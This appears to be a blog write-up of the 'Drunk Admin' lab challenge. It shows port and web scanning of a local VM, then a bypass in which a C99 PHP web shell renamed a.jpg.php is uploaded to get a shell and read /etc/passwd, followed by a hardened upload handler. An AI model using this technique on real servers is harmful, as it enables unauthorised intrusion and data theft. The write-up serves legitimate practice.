Thursday, 9 January 2014

Drunk Admin Web Hacking Challenge - information gathering + install a backdoor shell

netdiscover

Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:3c:21:4a    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.104  08:00:27:63:94:10    01    060   CADMUS COMPUTER SYSTEMS

root@kali:~# unicornscan -mT 192.168.56.104
TCP open                 ssh[   22]        from 192.168.56.104  ttl 64
Main [Error   chld.c:53] am i missing children?, oh well

root@kali:~# nmap 192.168.56.104 -pT0-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:04 CET
Nmap scan report for 192.168.56.104
Host is up (0.00039s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8880/tcp open  cddbp-alt
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)

root@kali:~# nmap -sS -sV -O 192.168.56.104 -pT22,8880

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:10 CET
Nmap scan report for 192.168.56.104
Host is up (0.00037s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
8880/tcp open  http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.26 - 2.6.35, Linux 2.6.32
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

root@kali:~# nikto -host 192.168.56.104 -port 8880
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        8880
+ Start Time:         2014-01-08 17:13:50 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze8
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie trypios created without the httponly flag
+ Server leaks inodes via ETags, header found with file /bBqXOGa0.eml, inode: 0x723b2, size: 0x33, mtime: 0x4ba515bf8ec40;4bcb127742900
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /info/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2014-01-08 17:14:02 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.104:8880/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Wed Jan  8 17:15:16 2014
URL_BASE: http://192.168.56.104:8880/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://192.168.56.104:8880/ ----
+ http://192.168.56.104:8880/cgi-bin/ (CODE:403|SIZE:292)
+ http://192.168.56.104:8880/image (CODE:200|SIZE:1392)
...
+ http://192.168.56.104:8880/info (CODE:200|SIZE:1600)
...
+ http://192.168.56.104:8880/upload (CODE:200|SIZE:57)
...
-----------------
DOWNLOADED: 13776 - FOUND: 23

http://192.168.56.104:8880/

View source:

<a href="myphp.php?id=102">PHP</a>

http://192.168.56.104:8880/myphp.php?id=102

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

...

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C1000

Try harder, you might find something here. Or not? Who knows.

http://192.168.56.104:8880/myphp.php?id=101

Linux drunkadm 2.6.32-5-686

This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1,
This server is protected with the Suhosin Patch 0.9.9.1

http://192.168.56.104:8880/myphp.php?id=108
Server Root     /etc/apache2

DOCUMENT_ROOT     /var/www
X-Powered-By     PHP/5.3.3-7+squeeze8
Set-Cookie     trypios=nop; expires=Wed, 08-Jan-2014 17:28:43 GMT

http://192.168.56.104:8880/myphp.php?id=116

APACHE_RUN_USER     www-data
APACHE_LOG_DIR     /var/log/apache2

http://192.168.56.104:8880/myphp.php?id=132

PHP Variables

http://192.168.56.104:8880/upload

upload a jpg


Live HTTP Headers:

Set-Cookie: trypios=394659692a460258b45a99f1424ea357; expires=Wed, 08-Jan-2014 18:42:49 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=394659692a460258b45a99f1424ea357

source:

<img src="images/394659692a460258b45a99f1424ea357.jpg" >

http://192.168.56.104:8880/images/394659692a460258b45a99f1424ea357.jpg

Cookie: trypios=uploader

--
php encoder here:
http://xploitaday.komodin.org/tools/php-encoder/

download c99_preg_entropy.php

cp c99_preg_entropy.php a.jpg.php

http://192.168.56.104:8880/upload  

a.jpg.php

Set-Cookie: trypios=922def33ac603be53b99c558f73c4db7; expires=Wed, 08-Jan-2014 18:58:28 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=922def33ac603be53b99c558f73c4db7

http://192.168.56.104:8880/images/922def33ac603be53b99c558f73c4db7.php

I got a C99 php shell on the system.
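The upload on this box accepted a.jpg.php and then served it from images/ as executable PHP. As an added example that is not part of the challenge or of this post, here is how an upload handler for the same flow (a JPEG upload stored under a server-chosen name and referenced from image.php) can be written so that the client's filename never decides what lands on disk; the function name, the 2 MB limit and the /var/www/images path are assumptions.

```php
<?php
// Added example: hardened JPEG upload handler for the flow seen on this box.
// Assumptions (not from the challenge): the upload arrives in $_FILES['file']
// and images live under /var/www/images; the stored name comes from a
// server-side random token, never from the client's filename.

function store_jpeg_upload(array $file, string $image_dir): ?string
{
    // Accept only a clean, fully received upload.
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Size cap (2 MB is an assumption for the example).
    if ($file['size'] > 2 * 1024 * 1024) {
        return null;
    }
    // Decide the type from the bytes, not from the client name or MIME claim.
    // Both checks must agree: finfo reads the magic bytes, getimagesize parses
    // the image headers, so a script renamed to .jpg fails here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== 'image/jpeg') {
        return null;
    }
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        return null;
    }
    // Re-encode through GD so only decoded pixel data reaches disk;
    // anything else inside the uploaded file is discarded.
    $img = @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        return null;
    }
    // Server-chosen name with a fixed .jpg extension: a client name such as
    // "a.jpg.php" has no influence on the stored path.
    $name = bin2hex(random_bytes(16)) . '.jpg';
    $dest = rtrim($image_dir, '/') . '/' . $name;
    $ok = imagejpeg($img, $dest, 90);
    imagedestroy($img);
    if (!$ok) {
        return null;
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

// Usage: $name = store_jpeg_upload($_FILES['file'], '/var/www/images');
// image.php then references images/<name> and serves it as image/jpeg.
```

Pair it with Apache configuration that turns the PHP engine off for the images directory (with mod_php, `php_admin_flag engine off` inside the matching <Directory> block), so that even a file that slips through is served as data rather than run.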

get /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/false
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
mysql:x:104:107:MySQL Server,,,:/var/lib/mysql:/bin/false


ls -al /home/bob

total 28
drwxr-xr-x 4 bob  bob  4096 Mar  6  2012 .
drwxr-xr-x 3 root root 4096 Mar  3  2012 ..
-rw-r--r-- 1 bob  bob   220 Mar  3  2012 .bash_logout
-rw-r--r-- 1 bob  bob  3184 Mar  3  2012 .bashrc
-rw-r--r-- 1 bob  bob   675 Mar  3  2012 .profile
drwxr-xr-x 2 root root 4096 Mar  6  2012 Documents
drwxr-xr-x 3 bob  bob  4096 Mar  6  2012 public_html

http://192.168.56.104:8880/~bob/

http://192.168.56.104:8880/~bob/encrypt.php

I didn't find any privilege escalation bug in this system...

Hints from here: http://www.sec-track.com/solucionario-del-reto-security-challenge-ctf-web-por-nonroot-ganador-del-reto
